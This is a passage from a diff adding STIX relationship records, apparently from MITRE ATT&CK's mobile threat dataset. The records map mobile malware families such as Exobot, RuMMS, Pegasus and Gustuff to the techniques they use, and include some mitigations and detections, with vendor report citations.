"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Threat Fabric Exobot", + "description": "Threat Fabric. (2017, February). Exobot - Android banking Trojan on the rise. 
Retrieved October 29, 2020.", + "url": "https://www.threatfabric.com/blogs/exobot_android_banking_trojan_on_the_rise.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:11:02.157Z", + "description": "[Exobot](https://attack.mitre.org/software/S0522) has used HTTPS for C2 communication.(Citation: Threat Fabric Exobot)", + "relationship_type": "uses", + "source_ref": "malware--c91cec55-634c-4670-ba10-2dc7ceb28e98", + "target_ref": "attack-pattern--2282a98b-5049-4f61-9381-55baca7c1add", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--18d3f4c7-2888-4d27-9ac7-b7ade1a1c04c", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "NYTimes-BackDoor", + "description": "Matt Apuzzo and Michael S. Schmidt. (2016, November 15). Secret Back Door in Some U.S. Phones Sent Data to China, Analysts Say. 
Retrieved February 6, 2017.", + "url": "https://www.nytimes.com/2016/11/16/us/politics/china-phones-software-security.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:23:04.150Z", + "description": "[Adups](https://attack.mitre.org/software/S0309) transmitted the full contents of text messages.(Citation: NYTimes-BackDoor)", + "relationship_type": "uses", + "source_ref": "malware--f6ac21b6-2592-400c-8472-10d0e2f1bfaf", + "target_ref": "attack-pattern--c6421411-ae61-42bb-9098-73fddb315002", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--0b1f2735-97d9-4f4a-9967-9fa1464bb651", + "created": "2023-04-11T19:54:52.711Z", + "revoked": false, + "external_references": [ + { + "source_name": "cleafy_sova_1122", + "description": "Francesco Lubatti, Federico Valentini. (2022, November 8). SOVA malware is back and is evolving rapidly. 
Retrieved March 30, 2023.", + "url": "https://www.cleafy.com/cleafy-labs/sova-malware-is-back-and-is-evolving-rapidly" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-11T19:54:52.711Z", + "description": "[S.O.V.A.](https://attack.mitre.org/software/S1062) can programmatically tap the screen or swipe.(Citation: cleafy_sova_1122)", + "relationship_type": "uses", + "source_ref": "malware--4b53eb01-57d7-47b4-b078-22766b002b36", + "target_ref": "attack-pattern--d1f1337e-aea7-454c-86bd-482a98ffaf62", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--9d2a9348-5d0a-43b0-8776-e9bbddc659c7", + "created": "2023-03-20T18:48:56.995Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:48:56.995Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43", + "target_ref": "attack-pattern--b1c95426-2550-4621-8028-ceebf28b3a47", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--a82d3cfb-7ef2-4e39-a6e1-3097d7b106f7", + "type": "relationship", + "created": "2019-03-11T15:13:40.425Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "description": "Karl Dominguez. (2011, September 27). ANDROIDOS_ANSERVER.A. 
Retrieved November 30, 2018.", + "url": "https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/ANDROIDOS_ANSERVER.A", + "source_name": "TrendMicro-Anserver2" + } + ], + "modified": "2019-10-15T19:55:04.517Z", + "description": "[ANDROIDOS_ANSERVER.A](https://attack.mitre.org/software/S0310) gathers the device OS version, device build version, manufacturer, and model.(Citation: TrendMicro-Anserver2)", + "relationship_type": "uses", + "source_ref": "malware--4bf6ba32-4165-42c1-b911-9c36165891c8", + "target_ref": "attack-pattern--e2ea7f6b-8d4f-49c3-819d-660530d12b77", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--9c284d41-21ef-4009-bb47-3ae09b08f38d", + "created": "2022-04-01T17:06:06.950Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Users should be wary of granting applications dangerous or privacy-intrusive permissions, such as access to location information. Users should also protect their account credentials and enable multi-factor authentication options when available. 
", + "modified": "2022-04-01T17:06:06.950Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--653492e3-27be-4a0e-b08c-938dd2b7e0e1", + "target_ref": "attack-pattern--99e6295e-741b-4857-b6e5-64989eb039b4", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--828417ec-c444-41c8-95b4-c339c5ecf62b", + "created": "2022-03-30T20:48:00.360Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "iOS users should be instructed to not download applications from unofficial sources, as applications distributed via the Apple App Store cannot list installed applications on a device.", + "modified": "2022-03-30T20:48:00.360Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--653492e3-27be-4a0e-b08c-938dd2b7e0e1", + "target_ref": "attack-pattern--198ce408-1470-45ee-b47f-7056050d4fc2", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--4ff5f854-bfe9-45bc-b11a-196cf826b760", + "created": "2022-03-30T14:41:20.735Z", + "x_mitre_version": "0.1", + "external_references": [ + { + "source_name": "Android Changes to System Broadcasts", + "url": "https://developer.android.com/guide/components/broadcasts#changes-system-broadcasts", + "description": "Google. (2019, December 27). Broadcasts Overview. Retrieved January 27, 2020." 
+ } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "Android 8 introduced additional limitations on the implicit intents that an application can register for.(Citation: Android Changes to System Broadcasts)", + "modified": "2022-03-30T14:41:20.735Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--0beabf44-e8d8-4ae4-9122-ef56369a2564", + "target_ref": "attack-pattern--3775a580-a1d1-46c4-8147-c614a715f2e9", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--2b0f4c1d-8d99-4e80-8555-d9a454d5cab7", + "created": "2023-03-20T18:55:33.546Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:55:33.546Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--5ae32c6a-2d12-4b8f-81ca-f862f2be0962", + "target_ref": "attack-pattern--1d44f529-6fe6-489f-8a01-6261ac43f05e", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--29dc105c-0b1b-4645-85ef-436c096bd3e2", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "FireEye-RuMMS", + "description": "Wu Zhou, Deyu Hu, Jimmy Su, Yong Kang. (2016, April 26). RUMMS: THE LATEST FAMILY OF ANDROID MALWARE ATTACKING USERS IN RUSSIA VIA SMS PHISHING. 
Retrieved February 6, 2017.", + "url": "https://www.fireeye.com/blog/threat-research/2016/04/rumms-android-malware.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:24:38.256Z", + "description": "[RuMMS](https://attack.mitre.org/software/S0313) uploads incoming SMS messages to a remote command and control server.(Citation: FireEye-RuMMS)", + "relationship_type": "uses", + "source_ref": "malware--936be60d-90eb-4c36-9247-4b31128432c4", + "target_ref": "attack-pattern--c6421411-ae61-42bb-9098-73fddb315002", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--4ad83f33-c64a-4ad6-ab6f-0548c9dde257", + "type": "relationship", + "created": "2020-10-29T17:48:27.469Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Threat Fabric Exobot", + "url": "https://www.threatfabric.com/blogs/exobot_android_banking_trojan_on_the_rise.html", + "description": "Threat Fabric. (2017, February). Exobot - Android banking Trojan on the rise. Retrieved October 29, 2020." 
+ } + ], + "modified": "2020-10-29T17:48:27.469Z", + "description": "[Exobot](https://attack.mitre.org/software/S0522) can forward SMS messages.(Citation: Threat Fabric Exobot)", + "relationship_type": "uses", + "source_ref": "malware--c91cec55-634c-4670-ba10-2dc7ceb28e98", + "target_ref": "attack-pattern--b327a9c0-e709-495c-aa6e-00b042136e2b", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--14143e21-51bf-4fa7-a949-d22a8271f590", + "type": "relationship", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "url": "http://blog.trendmicro.com/trendlabs-security-intelligence/hacking-team-rcsandroid-spying-tool-listens-to-calls-roots-devices-to-get-in/", + "description": "Veo Zhang. (2015, July 21). Hacking Team RCSAndroid Spying Tool Listens to Calls; Roots Devices to Get In. 
Retrieved December 22, 2016.", + "source_name": "TrendMicro-RCSAndroid" + } + ], + "modified": "2019-08-09T17:53:48.780Z", + "description": "[RCSAndroid](https://attack.mitre.org/software/S0295) can record audio using the device microphone.(Citation: TrendMicro-RCSAndroid)", + "relationship_type": "uses", + "source_ref": "malware--363bc05d-13cb-4e98-a5b7-e250f2bbdc2b", + "target_ref": "attack-pattern--6683aa0c-d98a-4f5b-ac57-ca7e9934a760", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--91831379-b0da-4019-a7bb-17e53cda9d0b", + "type": "relationship", + "created": "2020-12-31T18:25:05.131Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "CYBERWARCON CHEMISTGAMES", + "url": "https://www.youtube.com/watch?v=xoNSbm1aX_w", + "description": "B. Leonard, N. Mehta. (2019, November 21). The Secret Life of Sandworms. Retrieved December 31, 2020." 
+ } + ], + "modified": "2020-12-31T18:25:05.131Z", + "description": "[CHEMISTGAMES](https://attack.mitre.org/software/S0555) has utilized native code to decrypt its malicious payload.(Citation: CYBERWARCON CHEMISTGAMES)", + "relationship_type": "uses", + "source_ref": "malware--a0d774e4-bafc-4292-8651-3ec899391341", + "target_ref": "attack-pattern--52eff1c7-dd30-4121-b762-24ae6fa61bbb", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--706c698c-aa8d-4fac-a6c1-2e047c3f965c", + "type": "relationship", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout-BrainTest", + "description": "Chris Dehghanpoor. (2016, January 6). Brain Test re-emerges: 13 apps found in Google Play Read more: Brain Test re-emerges: 13 apps found in Google Play. 
Retrieved December 21, 2016.", + "url": "https://blog.lookout.com/blog/2016/01/06/brain-test-re-emerges/" + } + ], + "modified": "2018-10-17T00:14:20.652Z", + "description": "Original samples of [BrainTest](https://attack.mitre.org/software/S0293) download their exploit packs for rooting from a remote server after installation.(Citation: Lookout-BrainTest)", + "relationship_type": "uses", + "source_ref": "malware--e13d084c-382f-40fd-aa9a-98d69e20301e", + "target_ref": "attack-pattern--6c49d50f-494d-4150-b774-a655022d20a6", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--1417d832-3fa5-4a87-a40b-5ca2d4ee5d1c", + "created": "2022-04-01T14:59:39.294Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Apple regularly provides security updates for known OS vulnerabilities.", + "modified": "2022-04-01T14:59:39.294Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--bcecd036-f40e-4916-9f8e-fd0ccf0ece8d", + "target_ref": "attack-pattern--cc6e0637-76d2-4af3-a604-9d8d3ff8a6b3", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--6a5f151f-36cb-496a-9d0c-d726f1b00d4e", + "created": "2023-03-16T18:26:45.940Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-16T18:26:45.940Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--85a533a4-5fa4-4dba-b45d-f0717bedd6e6", + "target_ref": "attack-pattern--46d818a5-67fa-4585-a7fc-ecf15376c8d5", + "x_mitre_deprecated": false, + 
"x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--cc4ae06f-0258-4fe9-b63a-334d283e766d", + "type": "relationship", + "created": "2021-02-08T16:36:20.774Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "BlackBerry Bahamut", + "url": "https://www.blackberry.com/us/en/pdfviewer?file=/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-spark-bahamut.pdf", + "description": "The BlackBerry Research & Intelligence Team. (2020, October). BAHAMUT: Hack-for-Hire Masters of Phishing, Fake News, and Fake Apps. Retrieved February 8, 2021." + } + ], + "modified": "2021-05-24T13:16:56.495Z", + "description": "[Windshift](https://attack.mitre.org/groups/G0112) has encrypted application strings using AES in ECB mode and Blowfish, and stored strings encoded in hex during Operation BULL. Further, in Operation BULL, encryption keys were stored within the application’s launcher icon file.(Citation: BlackBerry Bahamut)", + "relationship_type": "uses", + "source_ref": "intrusion-set--afec6dc3-a18e-4b62-b1a4-5510e1a498d1", + "target_ref": "attack-pattern--d13fa042-8f26-44e1-a2a8-af0bf8e2ac9a", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--be17dc63-5b0a-491a-be5f-132058444c3a", + "type": "relationship", + "created": "2019-08-09T17:52:13.352Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout-PegasusAndroid", + "description": "Mike Murray. (2017, April 3). 
Pegasus for Android: the other side of the story emerges. Retrieved April 16, 2017.", + "url": "https://blog.lookout.com/blog/2017/04/03/pegasus-android/" + } + ], + "modified": "2019-08-09T17:52:31.877Z", + "description": "[Pegasus for Android](https://attack.mitre.org/software/S0316) has the ability to take pictures using the device camera.(Citation: Lookout-PegasusAndroid)", + "relationship_type": "uses", + "source_ref": "malware--93799a9d-3537-43d8-b6f4-17215de1657c", + "target_ref": "attack-pattern--d8940e76-f9c1-4912-bea6-e21c251370b6", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--c49bae52-63b4-4e5e-adfd-65a0e852ed76", + "created": "2023-03-20T18:42:18.058Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:42:18.058Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6", + "target_ref": "attack-pattern--0d4e3bbb-7af5-4c88-a215-0c0906bc1e8d", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--33857221-2543-4a7f-8255-b0d140d70ad7", + "type": "relationship", + "created": "2020-07-20T13:27:33.461Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Talos-WolfRAT", + "url": "https://blog.talosintelligence.com/2020/05/the-wolf-is-back.html", + "description": "W. Mercer, P. Rascagneres, V. Ventura. (2020, May 19). The wolf is back... . Retrieved July 20, 2020." 
+ } + ], + "modified": "2020-08-10T21:57:54.686Z", + "description": "[WolfRAT](https://attack.mitre.org/software/S0489) can record call audio.(Citation: Talos-WolfRAT)", + "relationship_type": "uses", + "source_ref": "malware--dfdac962-9461-47f0-a212-36dfce2a97e6", + "target_ref": "attack-pattern--6683aa0c-d98a-4f5b-ac57-ca7e9934a760", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--cdb9788e-7d16-482e-92b6-cbde0b3de357", + "type": "relationship", + "created": "2020-12-17T20:15:22.408Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Palo Alto HenBox", + "url": "https://unit42.paloaltonetworks.com/unit42-henbox-chickens-come-home-roost/", + "description": "A. Hinchliffe, M. Harbison, J. Miller-Osborn, et al. (2018, March 13). HenBox: The Chickens Come Home to Roost. Retrieved September 9, 2019." + } + ], + "modified": "2020-12-17T20:15:22.408Z", + "description": "[HenBox](https://attack.mitre.org/software/S0544) can track the device’s location.(Citation: Palo Alto HenBox)", + "relationship_type": "uses", + "source_ref": "malware--aef537ba-10c2-40ed-a57a-80b8508aada4", + "target_ref": "attack-pattern--99e6295e-741b-4857-b6e5-64989eb039b4", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--98dec4bf-6753-4d7a-8983-d4fd6d1d892a", + "created": "2020-11-20T16:37:28.475Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Symantec GoldenCup", + "description": "R. Iarchy, E. Rynkowski. (2018, July 5). GoldenCup: New Cyber Threat Targeting World Cup Fans. 
Retrieved October 29, 2020.", + "url": "https://symantec-enterprise-blogs.security.com/blogs/expert-perspectives/goldencup-new-cyber-threat-targeting-world-cup-fans" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T19:52:20.309Z", + "description": "[Golden Cup](https://attack.mitre.org/software/S0535) can collect the device’s contact list.(Citation: Symantec GoldenCup)", + "relationship_type": "uses", + "source_ref": "malware--f3975cc0-72bc-4308-836e-ac701b83860e", + "target_ref": "attack-pattern--e0b9ecb8-a7d1-43c7-aa30-8e19c6a92c86", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--8b8a9c44-c8a4-4f30-a3d8-a23310f6c090", + "created": "2023-03-20T18:58:30.773Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:58:30.773Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--bf0ff551-a5a7-40e5-bff9-f9405011b1f4", + "target_ref": "attack-pattern--e422b6fa-4739-46b9-992e-82f1b350c780", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--72a88d43-4144-444e-8f71-ac0d19ae3710", + "type": "relationship", + "created": "2020-09-14T14:13:45.256Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout eSurv", + "url": "https://blog.lookout.com/esurv-research", + "description": "A. Bauer. 
(2019, April 8). Lookout discovers phishing sites distributing new iOS and Android surveillanceware. Retrieved September 11, 2020." + } + ], + "modified": "2020-09-14T14:13:45.256Z", + "description": "[eSurv](https://attack.mitre.org/software/S0507) can track the device’s location.(Citation: Lookout eSurv)", + "relationship_type": "uses", + "source_ref": "malware--680f680c-eef9-4f8a-b5f5-f451bf47e403", + "target_ref": "attack-pattern--99e6295e-741b-4857-b6e5-64989eb039b4", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--c2536a3c-bb84-42b7-8ac6-05f26205a4ad", + "created": "2021-10-01T14:42:49.159Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "SecureList BusyGasper", + "url": "https://securelist.com/busygasper-the-unfriendly-spy/87627/", + "description": "Alexey Firsh. (2018, August 29). BusyGasper – the unfriendly spy. Retrieved October 1, 2021." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[BusyGasper](https://attack.mitre.org/software/S0655) can utilize the device’s sensors to determine when the device is in use and subsequently hide malicious activity. 
When active, it attempts to hide its malicious activity by turning the screen’s brightness as low as possible and muting the device.(Citation: SecureList BusyGasper)", + "modified": "2022-04-12T10:01:44.682Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--e110f94a-e2c5-4f5f-ba78-9c2ab6d2d9e4", + "target_ref": "attack-pattern--24a77e53-0751-46fc-b207-99378fb35c08", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--b0d0541d-caeb-43c0-906c-2e1e2ec25f69", + "created": "2019-10-14T19:14:18.673Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Group IB Gustuff Mar 2019", + "description": "Group-IB. (2019, March 28). Group-IB uncovers Android Trojan named «Gustuff» capable of targeting more than 100 global banking apps, cryptocurrency and marketplace applications. 
Retrieved September 3, 2019.", + "url": "https://www.group-ib.com/blog/gustuff" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:32:47.359Z", + "description": "[Gustuff](https://attack.mitre.org/software/S0406) hides its icon after installation.(Citation: Group IB Gustuff Mar 2019) ", + "relationship_type": "uses", + "source_ref": "malware--ff8e0c38-be47-410f-a2d3-a3d24a87c617", + "target_ref": "attack-pattern--f05fc151-aa62-47e3-ae57-2d1b23d64bf6", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--43eeee7f-339a-4f6e-9df3-ccbf08ecf358", + "type": "relationship", + "created": "2020-11-10T17:08:35.664Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout Uyghur Campaign", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. Retrieved November 10, 2020." 
+ } + ], + "modified": "2020-12-01T19:48:44.840Z", + "description": "[CarbonSteal](https://attack.mitre.org/software/S0529) has looked for specific applications, such as MiCode.(Citation: Lookout Uyghur Campaign)", + "relationship_type": "uses", + "source_ref": "malware--007ebf84-4e14-44c7-a5aa-151d5de85320", + "target_ref": "attack-pattern--198ce408-1470-45ee-b47f-7056050d4fc2", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--c89f8f8d-222b-4b83-9fa4-47fd716a271f", + "created": "2020-06-26T15:12:40.100Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "ESET DEFENSOR ID", + "description": "L. Stefanko. (2020, May 22). Insidious Android malware gives up all malicious features but one to gain stealth. Retrieved June 26, 2020.", + "url": "https://www.welivesecurity.com/2020/05/22/insidious-android-malware-gives-up-all-malicious-features-but-one-gain-stealth/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:49:00.042Z", + "description": "[DEFENSOR ID](https://attack.mitre.org/software/S0479) abuses the accessibility service to auto-start the malware on device boot. 
